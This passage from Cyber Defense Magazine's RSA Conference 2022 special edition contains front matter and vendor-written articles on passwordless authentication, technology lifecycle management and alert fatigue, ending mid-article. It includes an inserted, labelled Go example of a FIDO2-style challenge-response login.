CYBER DEFENSE MAGAZINE - RSA CONFERENCE 2022 SPECIAL EDITION

Welcome to CDM's RSA Conference 2022 Special Edition
On behalf of Cyber Defense Media Group and our affiliates, we are delighted to bring you this combined issue of
Cyber Defense Magazine for the RSA Annual Conference and the month of June 2022.
With over 10 years of successful publication, we are especially pleased to enjoy this ongoing, mutually supportive
relationship with the internationally recognized and respected RSA organization.
Given the apparent trend in cybersecurity to involve participants from beyond the world of cybersecurity
professionals, it’s appropriate to mention a few of the editorial guidelines by which CDM lives and operates.
Cyber Defense Magazine is and always has been a non-partisan, non-political publication. We encourage the
free exchange of ideas and expertise in cybersecurity and seek to provide our readers with the latest and most
actionable information available.
As distinguished from social media sites, we occasionally receive submissions from authors with diverse
viewpoints which may seem to be outside the norms of cybersecurity practice, or which tend to leave cyber issues
in favor of polemics. We make every effort to avoid any real or perceived censorship in choosing articles.
In general, it’s our editorial policy to restrict editing to typographical errors, grammar, and to do no modifications
to the authored content as submitted.
In that spirit, we wish to emphasize that any political or partisan or issue-related matters beyond cyber defense
professionalism are the views of the authors alone, and neither advocated for nor against by CDM.
We encourage CDM readers to read all articles objectively and reach your own conclusions, especially in this era
of freedom of speech issues.
Wishing you all success in your cybersecurity endeavors,
Yan Ross
U.S. Editor-in-Chief
Cyber Defense Magazine
About the Author
Yan Ross, J.D., is a Cybersecurity Journalist & Editor-in-Chief of Cyber Defense
Magazine. He is an accredited author and educator and has provided editorial
services for award-winning best-selling books on a variety of topics. He also
serves as ICFE's Director of Special Projects, and the author of the Certified
Identity Theft Risk Management Specialist ® XV CITRMS® course. As an
accredited educator for over 20 years, Yan addresses risk management in the
areas of identity theft, privacy, and cyber security for consumers and
organizations holding sensitive personal information. You can reach him by
e-mail at yan.ross@cyberdefensemediagroup.com
Contents
Welcome to CDM's RSA Conference 2022 Special Edition ...................................................... 9
How Passwordless Can Help Us Win the Ransomware War .................................................. 14
By Hemen Vimadalal, CEO and founder of 1Kosmos
Security For Want of a Nail ................................................................................................... 18
By Gregory Hoffer, CEO, Coviant Software
Alert Fatigue Puts Your Organization at Risk; Here’s What to Do About It ............................. 24
By Derek Nugent Vice President Sales, Marketing & Customer Success at Difenda
How to Protect All Five Stages of the IoT Security Lifecycle ................................................. 31
By Mitchell Bezzina, Senior Director, Product Marketing, Cloud-delivered Security Services, Palo Alto Networks
More Than A “You’ve Been Breached” Mentality - Zero Trust, Quantum Computers, And the
Future of Cyber .................................................................................................................... 35
By Dr. Torsten Saab, Principal Engineering Fellow, Raytheon
It’s time for Internet Providers to Become Primary Security Providers ................................. 38
By Barry Spielman, Director of Product Marketing, Allot
“Know your enemy,” and other cybersecurity lessons from Sun Tzu’s Art of War ................. 41
By Shmulik Yehezkel (Colonel, res), Chief Critical Cyber Operations Officer at CYE Security
Why Zero Trust is Easier Said Than Done ............................................................................. 45
By John Vecchi, CMO, Anitian
Why Are Cyber Insurance Premiums Going Up, And How Can You Get a Better Deal? ........... 48
By Jamie Wilson, MD & Founder, Cryptoloc Technology Group
AI/ML Powered Risk Modeling: A Decision-Making Framework ........................................... 53
By AJ Sarkar, Founder and CEO of OptimEyes.ai
Feeling Beleaguered? 3 Practical Steps for Cybersecurity Mastery ...................................... 56
By Tim Liu, Co-Founder & CTO, Hillstone Networks
The Most Common Types of Cyberattacks Plaguing SMBs And How to Protect Against Them ........ 60
By Richard Clarke, Chief Insurance Officer, Colonial Surety
Why A “Group of Rivals” Developed A Cybersecurity Taxonomy, And What It Buys You ........ 63
By Charlie Miller, Senior Advisor, Shared Assessments, CTPRP, Distinguished Ponemon Fellow
What is Business Email Compromise? .................................................................................. 69
By Shanna Utgard, Senior Cyber Advocate, Defendify
Firewalls Aren’t Enough to Protect Against Evolving Cyber Threats ...................................... 72
By Pat McGarry, CTO, ThreatBlockr
The Top Five Reasons You Should Take Operational Technology Cybersecurity Seriously ... 75
By Matthew Morris, Global Managing Director, 1898 & Co.
Not Slowing Down ................................................................................................................ 79
By Kimberly Patlis Walsh, President and Managing Director of Corporate Risk Solutions (CRS)
Advantage- Disadvantage Analysis for Implementing Cloud Services .................................. 84
By Zsolt Baranya, Information Security Auditor, Black Cell Ltd.
Reshape Security and Embrace Cyber Resilience with Hillstone Networks ........................... 89
By Timothy Liu, CTO & Co-founder, Hillstone Networks
Moving Beyond Budget Battles: The Real Secret to Improving National Cyber Defenses ...... 91
By Teddra Burgess, SVP, Public Sector, Tanium
Continuous Biometric Authentication Tool Against Account Takeovers .............................. 96
By Tamas Zelczer, CEO, Cursor Insight
A Guide to Mitigating the Cyber Risks Posed by Refurbished Hardware ............................... 99
By Eloïse Tobler MSc, Ecommerce Supervisor, Wisetek
Acquiring Actionable Knowledge Through Collaboration .................................................... 103
By Nicole Mills, Exhibition Director, Infosecurity Group
Darkweb Monitoring ........................................................................................................... 106
By Kaustubh Medhe, Head of Research and Intelligence, Cyble
Replacing Weak Authentication Methods with Decentralized Security Infrastructure: The Move
Towards a Passwordless Future ........................................................................................ 109
By Frances Zelazny, CEO of Anonybit
The Password Is Dying. It’s Time for A DNR. ...................................................................... 112
By Lucas Budman, CEO, TruU
Analysing the true threat of Log4j ...................................................................................... 115
By Tom McVey, Sales Engineer EMEA, Menlo Security
Are We Shifting Left Enough .............................................................................................. 118
By Douglas Kinloch, VP of Business Development, PACE Anti-Piracy
Threats Against Critical Infrastructure Are Looming, Agencies Must Safely Modernize OT
Systems ............................................................................................................................. 121
By Josh Brodbent, Director of Public Sector Solutions Engineering, BeyondTrust
Welcome To the Datagovops Revolution ............................................................................ 125
By Ani Chaudhuri, CEO, Dasera
Preventing Ransomware Attacks on Industrial Networks ................................................... 130
By Michael Yehoshua, VP Marketing, SCADAfence
Zero-Trust Architecture Is Incomplete Without Digital Signatures ...................................... 136
By Geoff Mroz, Principal Digital Strategist, Adobe
Trends To Ensure Cybersecurity In 2022 ............................................................................ 140
By Héctor Guillermo Martínez, President of GM Sectec
How Much Is Your Data Actually Worth? ............................................................................ 143
By Jamie Wilson, MD & Founder, Cryptoloc Technology Group
Airports, Bridges, and Beltways ......................................................................................... 149
By Alan Cunningham, Journalist, Truth Be Told
Businesses Will Suffer Cyber-Attacks; But Do They Know the Real Cost? ........................... 152
By Reuven Aronashvili, Founder & Chief Executive Officer at CYE
aiXDR Brief ........................................................................................................................ 156
By Randy Blasik, V.P. of Technology Solutions, Seceon Inc.
Why Aren’t More Companies Capitalizing on Packet Capture? ........................................... 159
By Cary Wright, VP of Product Management, Endace
What Makes A USB Bad - And How Should Organizations Resolve This Risk? .................... 162
By Jon Fielding, Managing Director, EMEA Apricorn
eSentire Discovers Hackers Spearphishing Hiring Managers with Resumes Poisoned with
More_Eggs Malware ........................................................................................................... 165
By Keegan Keplinger, Research and Reporting Lead, Threat Response Unit, eSentire
Barriers To Entry Must Be Brought Down If More Women Are to Enter Cybersecurity ......... 169
By Sydney Asensio, Head of Operations at 2020 Partners
To Secure Saas, Combine Top Compliance Frameworks with An SSPM ............................. 172
By Maor Bin, CEO & Co-Founder, Adaptive Shield
Great Power Brings Great Responsibility: How to Keep Cloud Databases Secure in an Uncertain
World ................................................................................................................................. 176
By Bryan Alsdorf, Director of IT and Head of Information Security, MariaDB Corporation
Cybersecurity: Why We’re Stronger Together ..................................................................... 181
By Nicole Mills, Exhibition Director at Infosecurity Group
Why Physical Security Should Be Part of a Cybersecurity Strategy ..................................... 184
By David Weingot, Founder and CEO, DMAC Security
Zero Trust Architecture: Adoption, Benefits, and Best Practices ........................................ 188
By Harish Akali, Chief Technology Officer, ColorTokens
Azure PostgreSQL User Databases Were Exposed Due to Critical Vulnerabilities ............... 195
By Randy Reiter CEO of Don’t Be Breached
NFTS Are Cool but Dangerous ............................................................................................ 198
By Guy Rosefelt, CPO, Sangfor Technologies
The Need for Automated Remediation in Saas Security ...................................................... 201
By Noam Shaar, Co-Founder & CEO, Wing Security
Protect Your Executives’ Personal Digital Lives to Protect Your Company .......................... 206
By Dr Chris Pierson, BlackCloak Founder & CEO
It’s Time to Rethink Endpoint Security ................................................................................ 210
By Carolyn Crandall, Chief Security Advocate, Attivo Networks
Safeguarding Industrial Control Systems Environments ..................................................... 213
By Ryan Lung, Senior product manager at TXOne Networks
Securing Your Organization During Global Turmoil............................................................. 218
By Kevin Orr, President, RSA Federal
The Emergence of Dynamic Threat Hunting ....................................................................... 221
By James “Jim” McMurry, CEO / Founder, Milton Security, Inc.
Zero Trust: Security Model for A Fluid Perimeter ............................................................... 227
By Debanjali Ghosh, Technical Evangelist, ManageEngine
Welcome to the Cyber Defense Global InfoSec Awards for 2022 ........................................ 233
CYBER DEFENSE MAGAZINE
is a Cyber Defense Media Group (CDMG) publication distributed electronically via opt-in,
GDPR-compliant e-mail, HTML, PDF, mobile and online flipbook formats. All electronic editions
are available for free, always. No strings attached. Annual editions of CDM are distributed
exclusively at the RSA Conference each year for our USA editions and at IP EXPO EUROPE in the
UK for our Global editions.
Key contacts:
PUBLISHER
Gary S. Miliefsky
garym@cyberdefensemagazine.com
V.P. BUSINESS DEVELOPMENT
Olivier Vallez
olivier.vallez@cyberdefensemagazine.com
V.P. STRATEGIC INITIATIVES
John Rafuse
jr@cyberdefensemediagroup.com
EDITOR-IN-CHIEF
Yan Ross
yan.ross@cyberdefensemediagroup.com
MARKETING, ADVERTISING & INQUIRIES
marketing@cyberdefensemagazine.com
Interested in writing for us:
marketing@cyberdefensemagazine.com
CONTACT US:
Cyber Defense Magazine
Toll Free: +1-833-844-9468
International: +1-603-280-4451
New York (USA/HQ): +1-646-586-9545
London (UK/EU): +44-203-695-2952
Hong Kong (Asia): +852-580-89020
Skype: cyber.defense
E-mail: marketing@cyberdefensemagazine.com
Awards: www.cyberdefenseawards.com
Conferences: www.cyberdefenseconferences.com
Radio: www.cyberdefenseradio.com
TV: www.cyberdefensetv.com
Webinars: www.cyberdefensewebinars.com
Web: www.cyberdefensemagazine.com
Copyright © 2022, Cyber Defense Magazine
(CDM), a Cyber Defense Media Group (CDMG)
publication of the Steven G. Samuels LLC Media Corporation.
To Reach Us Via US Mail:
Cyber Defense Magazine
276 Fifth Avenue, Suite 704
New York, NY 10001
EIN: 454-18-8465
DUNS# 078358935
Welcome to CDM's RSA Conference 2022 Special Edition
June 6 kicks off our 31st RSA Conference, and we’re so excited to be back in-person at the Moscone Center
and to see our colleagues, peers and friends from around the world. We’re also pleased to offer a Digital
Pass for those who aren’t able to join us in person.
For over three decades, the Conference has served as a hub for the cybersecurity industry, bringing together
a wide array of professionals across all sectors and industries. This year’s theme, TRANSFORM – speaks to
how we, as a community, have transformed. We’ve gone from behind-the-scenes professionals focused on
strengthening walls to business enablers entrusted to make game-changing decisions. And as the world
becomes more digitized, it looks to us for protection and response.
This year, you’ll find an impressively diverse and richly informative agenda comprised of 25 tracks with more
than 350 sessions presented by over 600 industry experts. Between the West and South Stage keynotes, we
have some of the most esteemed leaders who will inspire, inform and motivate this year’s attendees to think
more deeply about both industry and personal transformations. But it doesn’t stop there. Once again,
attendees will have the chance to witness the next generation of cybersecurity innovators at the RSAC
Innovation Sandbox. The impact of the competition has always extended far beyond the Conference stage
and this year will be no different. We also know how important networking is to our attendees, and RSA
Conference 2022 will be loaded with opportunities to interact and collaborate with peers, sponsors, and
experts. And in addition, this year’s Expo will host more than 400 exhibitors showcasing a myriad of
cutting-edge solutions along with the RSAC Early Stage Expo with 35 of the industry’s most promising
startup companies!
As technology and innovation continue to transform the world around us, we must keep pace with those
changes and lead as an industry. We look forward to seeing you at RSAC this year.
Linda Gray Martin
Vice President, RSA Conference
How Passwordless Can Help Us Win the Ransomware War
By Hemen Vimadalal, CEO and founder of 1Kosmos
Approximately $590 million in ransomware payments were made in the U.S. in the first six months of
2021, more than the $416 million reported for the whole of 2020, according to a Reuters report.
And it's no surprise that stolen credentials are the primary means by which criminals hack into
organizations. In fact, the Verizon 2021 Data Breach Investigations Report noted that 61 percent of
breaches are attributed to compromised credentials.
The problem is that most companies are mired in the traditional approach that uses an authentication
method (such as a password, a one-time passcode, etc.) as a proxy for a user’s identity. Let’s consider
the shortcomings of this model.
Passwords have been around for roughly 60 years and are easily compromised via phishing attacks,
social engineering or simple carelessness, and many people reuse them across different systems.
Meanwhile, two-factor authentication doesn't prove identity at all. Instead, it simply provides hope that
email accounts, devices and apps haven’t been hacked.
Strong authentication using biometrics shows great promise in replacing passwords by moving beyond
the “something you know” or knowledge factor to the “something you are” or inherence factor. Inherence
factors are physical characteristics (typically facial, fingerprint, or voice recognition) used to verify a user's identity.
However, capturing user biometrics is one thing. Securing them is a completely different challenge,
because, just like passwords, digitized biometrics can be stolen.
Passwordless is the Future
Recent breakthroughs in standards and technologies make passwordless authentication not only
possible but cost-effective and convenient.
For example, NIST standard 800-63-3B covers how users can use enrolled identities to authenticate who
they are without usernames or passwords. The industry term for this is passwordless authentication.
Meanwhile, passwordless authentication has been popularized by the Fast Identity Online Alliance
(FIDO), a non-profit industry consortium supported by such companies as Google and Microsoft.
Its main standard is FIDO2, which enables users to store their biometrics behind a cryptographically
secured public-private key pair. The private key is stored in the Trusted Platform Module or Secure
Enclave of the device. That key (what you have) combined with a biometric such as TouchID, FaceID or
LiveID (what you are) become the two factors needed to verify the user can be trusted to access an
online service.
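The key-pair exchange described above, as an added Go example that is not part of the article or of any FIDO2 implementation: the service issues a random challenge, the device signs it only after a local biometric check (simulated here by a flag), and the service verifies with the enrolled public key, consumes the challenge and requires the signature counter to advance. The names Authenticator, RelyingParty and Login, the service identifier and the user name are this example's own assumptions, and P-256 ECDSA stands in for the authenticator's hardware-backed key.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"errors"
)

// Authenticator is the device side: the private key is created here and never leaves it (in hardware,
// a TPM or Secure Enclave); the biometric only unlocks local use, and the counter exposes clones and replays.
type Authenticator struct {
	priv    *ecdsa.PrivateKey
	counter uint32
}

// RelyingParty is the service: it stores public keys only, so a breached store yields no usable credential.
type RelyingParty struct {
	id       string
	pubKeys  map[string]*ecdsa.PublicKey
	counters map[string]uint32 // highest signature counter seen per user
	pending  map[string][]byte // one outstanding challenge per user
}

func NewAuthenticator() (*Authenticator, error) {
	priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	return &Authenticator{priv: priv}, nil
}

func (a *Authenticator) PublicKey() *ecdsa.PublicKey { return &a.priv.PublicKey }

// signedData ties the signature to the service (rpID), this login's challenge and the counter (no reuse).
func signedData(rpID string, challenge []byte, counter uint32) []byte {
	var c [4]byte
	binary.BigEndian.PutUint32(c[:], counter)
	h := sha256.New()
	h.Write([]byte(rpID))
	h.Write(challenge)
	h.Write(c[:])
	return h.Sum(nil)
}

// Sign signs only after the local biometric check; biometricOK stands in for face/fingerprint + liveness.
func (a *Authenticator) Sign(rpID string, challenge []byte, biometricOK bool) (uint32, []byte, error) {
	if !biometricOK {
		return 0, nil, errors.New("biometric verification failed; key not unlocked")
	}
	a.counter++
	sig, err := ecdsa.SignASN1(rand.Reader, a.priv, signedData(rpID, challenge, a.counter))
	return a.counter, sig, err
}

func NewRelyingParty(id string) *RelyingParty {
	return &RelyingParty{id, map[string]*ecdsa.PublicKey{}, map[string]uint32{}, map[string][]byte{}}
}

// Register is enrolment: the service keeps the public key and nothing secret.
func (rp *RelyingParty) Register(user string, pub *ecdsa.PublicKey) { rp.pubKeys[user] = pub }

// Challenge issues a fresh random nonce that is valid for exactly one login attempt.
func (rp *RelyingParty) Challenge(user string) []byte {
	ch := make([]byte, 32)
	if _, err := rand.Read(ch); err != nil {
		panic(err) // no usable randomness: refuse to issue a challenge at all
	}
	rp.pending[user] = ch
	return ch
}

// Verify consumes the one-time challenge, checks the signature and requires the counter to advance.
func (rp *RelyingParty) Verify(user string, counter uint32, sig []byte) error {
	ch, ok := rp.pending[user]
	if !ok {
		return errors.New("no outstanding challenge (replay?)")
	}
	delete(rp.pending, user)
	pub, enrolled := rp.pubKeys[user]
	if !enrolled || !ecdsa.VerifyASN1(pub, signedData(rp.id, ch, counter), sig) {
		return errors.New("signature does not verify against an enrolled key")
	}
	if counter <= rp.counters[user] {
		return errors.New("signature counter did not advance (cloned authenticator or replay)")
	}
	rp.counters[user] = counter
	return nil
}

// Login runs one full exchange: service challenge -> device biometric + signature -> verify.
func Login(rp *RelyingParty, auth *Authenticator, user string, biometricOK bool) error {
	counter, sig, err := auth.Sign(rp.id, rp.Challenge(user), biometricOK)
	if err != nil {
		return err
	}
	return rp.Verify(user, counter, sig)
}
```

Because the signed data includes the service identifier, an assertion produced for one site cannot be replayed against another, which is the property that makes the scheme phishing-resistant.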
For passwordless to work, certified authentication must enable a high level of certainty of the identity at
the end of a connection. Thus, identity becomes key to the security perimeter of an organization, and
removes the anonymity behind compromised credentials, which is also central to help organizations
move to a zero-trust architecture.
To ensure the success of passwordless authentication, the biometric must be sophisticated and
non-hackable. A “live selfie” is a must, using technology that detects depth of field, specific facial
movements, and all signs of photo and video manipulation.
The authentication mechanism needs to have a high degree of interoperability and be easily integrated
with operating systems, user stores, devices, SSO, and other applications preferably via API / SDK.
As a user biometric represents a high-value target for hackers, it should also be stored as safely as
possible.
Centralized administration provides a honeypot target ripe for ransomware, hacking, etc. Conversely,
distributed ledgers offer a vastly superior approach to security and facilitate user privacy in the
management and control of their own information.
Conclusion
Passwordless authentication results in a user-friendly computing experience that is highly resistant to
credential theft. It eliminates significant threats posed by unauthorized users logged into the corporate
IT network including data breaches, ransomware, commercial espionage, and financial fraud.
From an organizational perspective, passwordless authentication with identity simplifies IAM IT
architectures centered on passwords and 2FA security. More importantly, it helps organizations answer
with certainty the key question of “Who is logging into my digital services?”
About the Author
Hemen Vimadalal is CEO and founder of 1Kosmos, which unifies
identity and authentication to provide a passwordless and
frictionless user experience for employees and consumers. Prior
to 1Kosmos, Hemen founded Simeio Solutions and Vaau, both
of which had very successful exits. He is also an angel investor
in cyber security companies including Securonix, Saviynt,
BrinQa, Simeio, and others.
Security For Want of a Nail
Don’t Overlook Lifecycle and Data Management Details
By Gregory Hoffer, CEO, Coviant Software
Threat actors are a relentless bunch. They continue to evolve their tools and practices to try and stay one
step ahead of the influx of sophisticated countermeasures designed to detect and fend off their attacks;
and they have a great incentive to be good at what they do. By some estimates, cybercrime as an industry
grosses more than $600 billion annually. That’s a lot of money, and a lot of motivation.
But for all the attention paid to high-skill threat actors and the technologies built to thwart them, there are
a lot of hackers that are content with looking for targets of opportunity and who would prefer taking
advantage of more common weaknesses in plying their trade. They know that even the largest
organizations with the biggest cybersecurity budgets can overlook simple things that make it possible for
them to breach the wall, get inside, and do their thing.
A Common Weakness
One area that is a common weakness in enterprise security is lack of attention to technology lifecycle
management. The practice of keeping a meticulous inventory of what hardware, software, and
applications an organization is running, and then making sure everything is up-to-date, patched, and then
properly retired when obsolete or no longer needed is not one of the more glamorous aspects of
cybersecurity, but it is a vital component to a successful security strategy.
The results of poor tech lifecycle management were illustrated when the financial services firm Morgan
Stanley was hit with a $60 million fine by the U.S. Comptroller of the Currency in October of 2020 for
improper disposal of servers from a data center the company had decommissioned. Some of the
equipment was sold to a third-party and found to still contain unsecured customer data for as many as
15 million customers. That led to a class action lawsuit in which the courts found in favor of the plaintiffs
for an additional $60 million announced on January 3, 2022.
While it is unclear whether the personally identifiable information (PII) of those customers was unsecured,
or if the security status of the data was simply unverifiable, authorities require evidence of encryption,
and so the assumption is that the data was compromised. A thorough lifecycle management process
would have prompted the data on those systems to be rendered unrecoverable, and with proper data
management processes in place, actions like encryption and documentation would have provided an
auditable record to satisfy regulators that security and privacy laws were followed.
Meticulous Management
That is why it’s important to meticulously manage data—and the systems that store and move it—in
order to avoid these kinds of incidents. When older technologies become obsolete, and their makers decide to
end support, those systems become vulnerable to cybercriminals who target organizations known to use
them. The dangers of using old, unsupported tech were illustrated when, in early 2020, an unsupported
version of a file transfer appliance sold by Accellion was the focus of attacks by ransomware gangs.
Organizations around the world were affected, including retail, industrial, healthcare, academic,
government, and financial services. (Coincidentally, Morgan Stanley was one of the organizations
breached by attacks on the vulnerable appliance.)
Of course, technology lifecycle management is the responsibility of both the vendor and the user and
information from a vendor is critical to preparing for and responding to issues like patching, end of
support, and upgrades. While reports suggest that Accellion may have been less than forthcoming with
the status of their technology, another vendor in the data management space demonstrated a more
responsible posture when it decided to discontinue one of its products.
Plan for End-of-Life
In August of 2020, Qlik announced that its RepliWeb file transfer software product would reach its
end-of-life on January 31, 2021, and support for the product would cease at that time. Qlik was open with its
customers about the implications of the decision, giving them ample time to prepare for that date and find
a replacement for the file transfer function many organizations rely on.
Mozilla is another example of a company that discontinued support for a popular technology when it
announced last year that it would no longer support file transfer protocol (FTP) in version 90 of the popular
Firefox browser. That move followed the same decision by Google in December 2020 when it ended FTP
support for Chrome version 88. For organizations not paying attention, the lack of support for FTP in
those browsers could have serious security consequences. According to a ZDNet article, while FTP
remains a popular option for moving files between computers, the protocol is “burdened by enough
security issues that browser makers are dropping support for the protocol.”
Among the issues, files transferred via FTP are sent unencrypted, and FTP has also been used as an
attack vector in malware campaigns according to a statement by Mozilla’s security team, which read,
“The biggest security risk is that FTP transfers data in cleartext, allowing attackers to steal, spoof and
even modify the data transmitted. To date, many malware distribution campaigns launch their attacks by
compromising FTP servers and downloading malware on an end user’s device using the FTP protocol.”
Don’t Risk DIY
These issues highlight the importance of managing technology’s use and lifecycle. It also means making
sure the right tool is being used for important business processes, rather than trying to make do with
“close enough” products, or engineering do-it-yourself solutions. After all, FTP is still used for many
legitimate business transactions, and for someone with the right skills FTP can be secured and
automated. But even if someone can write the scripts necessary to tackle those functions, knowledge of
the nuances that need to be addressed for compliance is vital.
The shortcomings of the DIY approach may not be evident until there’s a breakdown in the process, such
as a transfer that fails, an alert that is missed, a security issue that occurs, or a call for a feature that
wasn’t considered when the custom scripts were written. That’s when risks increase—along with costs.
When it comes to file transfers, the approach an organization chooses can have implications on data
lifecycle management. Through process automation, a secure, managed file transfer (MFT) platform can
be used to ensure files are encrypted before being moved, and also upon receipt. And the ability to
automatically document all the steps in the send, receive, store, and retrieve process goes a long way
toward affirming compliance with regulations like Sarbanes-Oxley (SOX), Gramm-Leach-Bliley (GLBA),
the Health Insurance Portability and Accountability Act (HIPAA), Europe’s General Data Privacy
Regulation (GDPR), and other state, federal, and international laws.
Secure MFT is not a remedy to all of an organization’s security and data management issues, but it can
play an important role in maintaining a strong data security and data management program. It can also
help mitigate the risks of relying on human intervention, which often leads to mistakes and oversights
that can result in a costly data breach or a finding of non-compliance.
Reasonable Refresh
The good news is, these are not tools or processes that are beyond the reach of organizations operating
on smaller or constrained budgets, or that are understaffed. Nor do they require a “forklift upgrade”
technology refresh to achieve. In fact, a simple tech refresh may be all that is needed to address a specific
need and achieve gains in productivity and security. A recent column in the tech trade journal
Computerworld identified five reasons for a simple tech refresh, including:
Lack of Vendor Support for Older Systems;
Support Employee Remote Access;
Security Vulnerability Mitigation;
Enable Regulatory Compliance; and,
Improve Ease-of-Use.
Making changes necessary to address common-sense issues, like fixing or updating hardware, software,
or applications to keep pace with change is a necessary aspect of managing any organization’s IT estate
and to keeping data and systems secure. In fact, those changes are to be expected, and may only be a
minor nuisance. If you are responsible for managing your organization’s IT, it is not a good idea to put off
updates, additions, or replacements of technologies.
For Want of a Nail
There’s an old poem called For Want of a Nail that describes the catastrophic potential when a seemingly
simple detail is overlooked.
For want of a nail the shoe was lost.
For want of a shoe the horse was lost.
For want of a horse the rider was lost.
For want of a rider the message was lost.
For want of a message the battle was lost.
For want of a battle the kingdom was lost.
And all for the want of a horseshoe nail.
Don’t let a seemingly minor detail in your technology lifecycle management or data management program
be the missing nail that cascades into a major event like a data breach. Pay attention to the small things
and your organization’s security posture will improve.
About the Author
Gregory Hoffer is CEO of Coviant Software, maker of the secure,
managed file transfer platform Diplomat MFT. Greg’s career
spans two decades of successful organizational leadership and
award-winning product development. He was instrumental in
establishing ground-breaking technology partnerships that helped
accomplish Federal Information Processing Standards (FIPS), the
DMZ Gateway, OpenPGP, and other features essential for
protecting large files and data in transit.
For more information visit Coviant Software online, or follow
Coviant Software on Twitter and LinkedIn.
Alert Fatigue Puts Your Organization at Risk; Here’s What to Do About It
By Derek Nugent, Vice President Sales, Marketing & Customer Success at Difenda
Alerts, notifications, and non-stop calls from shady telemarketers pitching extended warranties: we all
get more alerts each day than we can manage. For security professionals, the flood of alerts is even
worse, much worse, extending to the essential tools they need to do their jobs.
The negative impacts of this deluge of alerts are felt anytime an overworked security professional
suffering from alert fatigue neglects to block an attacker or detect malware because the signals were
ignored or simply lost amidst the noise.
What Causes Alert Fatigue?
There are five main drivers of alert fatigue:
Security Technology Creep
Explosion of Automated Attacks
Ineffective Configuration and Use of Tools
Global Threat Landscape Events
Limited Resources to Devote to the Problem
Each new layer of security that businesses add to address evolving security risks generates its own
stream of notifications, alerts, and alarms. Some are actionable, many are not. Antivirus, IPS software,
and firewalls, to name only a few layers, all generate alerts that tend to be poorly correlated.
Due to the unbalanced nature of security defense vs. cyber-attackers on offense, security solutions tend
to be overly sensitive by design, which makes alert fatigue inevitable. After all, attackers need only be
successful once in order to severely damage a business, while the organization’s security team must
ward off attacks 24x7x365 to be successful.
As a result, security analysts, who are already coping with too many responsibilities and too few
resources, must constantly cope with alert fatigue, which leads to critical alerts being missed at an
alarmingly high rate. Alert overload not only increases your organization’s overall cybersecurity risks, but
also results in low job satisfaction and high turnover for burned out employees.
COVID-19, Digital Transformation Drive Spike in Alerts
When experts study enterprise security, they find a few troubling trends that directly cause an increase
of alert overload. First, as enterprises continue to migrate applications and data to the cloud as part of
digital transformation initiatives, new security protections are added, often from new vendors.
The Cloud Security Alliance’s recent report, “State of Cloud Security: Concerns, Challenges, and
Incidents,” found that as remote workforces grew, so too did the reliance on additional cloud-delivered
security tools and virtual firewalls. The report found that “the use of cloud providers’ additional security
controls jumped from 58% in 2019 to 71% in 2021.”
The report’s authors believe that due to the current health crisis and the dramatic increase in remote
work, many organizations are unable to secure their networks which are often hybrid ones with a mix
of legacy on-premises, public cloud, and private cloud infrastructure using only traditional tools.
Therefore, organizations have had no choice but to add new security controls, each of which generates
new alerts.
More than 5000 Daily Security Alerts, and that Was Before COVID
Now, consider that before the pandemic hit, Cisco found in its “2017 Annual Cybersecurity Report” that
44% of security operations managers were already inundated with more than 5000 security alerts per
day. In other words, alert fatigue was the new normal before remote workforces exploded and digital
transformation and cloud migration initiatives accelerated.
The study also found that most companies used more than five security products in their environment,
and those products often came from more than five security vendors. A full 65% of enterprises surveyed
used six or more security products, while more than half (55%) of those surveyed reported they had to
respond to alerts from at least six different vendors.
A 2019 study by CCS Insights of 400 senior IT leaders found that in enterprises with more than 1,000
employees the thicket of tools security teams must manage is even more complicated. CCS Insights
found that the average large business had more than 70 different security products from 35 different
suppliers, and while most enterprises intend to consolidate security, the consolidation trend has yet to
get started in any significant way.
As we start to emerge from the pandemic, security infrastructure isn’t getting any simpler and alert
volumes aren’t getting any easier to manage.
According to a recent survey of nearly 400 security operations professionals (commissioned by
Siemplify), 42% report that their alert volumes are higher now than before the pandemic, while 51% say
investigating suspicious activities has become a much bigger challenge in remote and hybrid
environments.
Unfortunately, a number of factors threaten to add to the problem of alert fatigue in the near-term. These
include but are not limited to the normalization of remote and mobile workforces, the rise of state-
sponsored malware and hacks related to Russia’s invasion of Ukraine, and easy access to and
automation of sophisticated hacking tools. At the same time, entire classes of threats are on the rise,
including critical infrastructure attacks, ransomware, cloud storage leaks, and business email
compromise attacks (BECs).
Thus, the volume of alerts will continue to rise and so too will the probability that your security team will
eventually miss something critical, leading to a hack, a costly data breach, or some other negative
outcome.
Unfortunately, another thing on the rise in parallel to alert overload is the cost of those negative outcomes.
For instance, IBM and the Ponemon Institute’s annual Cost of a Data Breach Report found that the cost
of an average data breach rose from $3.86 million in 2020 to $4.24 million in 2021, the highest average
total cost in the 17-year history of the report.
How Microsoft Tackles Alert Fatigue
One shortcut to reducing alert fatigue is through vendor consolidation. For instance, for those
organizations already dependent on Microsoft productivity tools and Azure Cloud, it makes sense to
consolidate on that platform.
Soon after investing heavily in its Azure cloud platform, Microsoft also saw the need to tightly integrate
security into its cloud stack, rather than layering it on afterwards. Thus, in recent years, Microsoft has
invested $1 billion in security development, and their investment has already earned recognition from
top-tier industry analysts. For instance, research firm Gartner lists Microsoft as a “leader” in a number of
its Magic Quadrant reports, including endpoint protection, access management, CASB, and more.
Microsoft has also mapped out a strategy to avoid alert fatigue, a strategy that can help your organization
regain control over alert flows.
Microsoft recommends adopting technologies such as Artificial Intelligence (AI) and Machine Learning
(ML) to help find signal in the alert noise. Organizations should automate as many error-prone, repetitive
tasks as possible in their SOCs, maintain up-to-date watch lists to prioritize activities from known bad
actors, and adopt cloud-native solutions for better integration.
For organizations already struggling with limited IT resources, however, there are a few other steps you
can follow to mitigate alert fatigue. The seven steps outlined below will help your organization alleviate
alert fatigue in a way that should align with initiatives already underway, such as digital transformation
and cloud migration.
7 Ways to Mitigate Alert Fatigue
1. Consolidate security tools and vendors
Managing multiple security tools from multiple vendors becomes much easier if you take a platform
approach to security and then build on that platform with best-in-class tools from the same vendor and/or
its vetted partners.
At my company Difenda, we decided to build our SecOps-as-a-Service around Microsoft security tools
not only because so many of them are best in class, but also because we believe that a consolidated
security approach is the only way to keep ahead of the problems created by an increasingly complex
threat environment.
Consolidated security stacks from single vendors and their certified partners will provide you with a unified
dashboard that makes it easier to correlate various alerts, while also making it less likely that
interoperability will undermine your defenses.
2. Integrate that which cannot be consolidated
Whatever vendor you decide to use as the foundation of your security stack, Microsoft or otherwise,
should be one with robust protections against a range of threats that also integrates easily with other
tools, offering your organization an easy way to pull other alerts from third-party tools into a unified
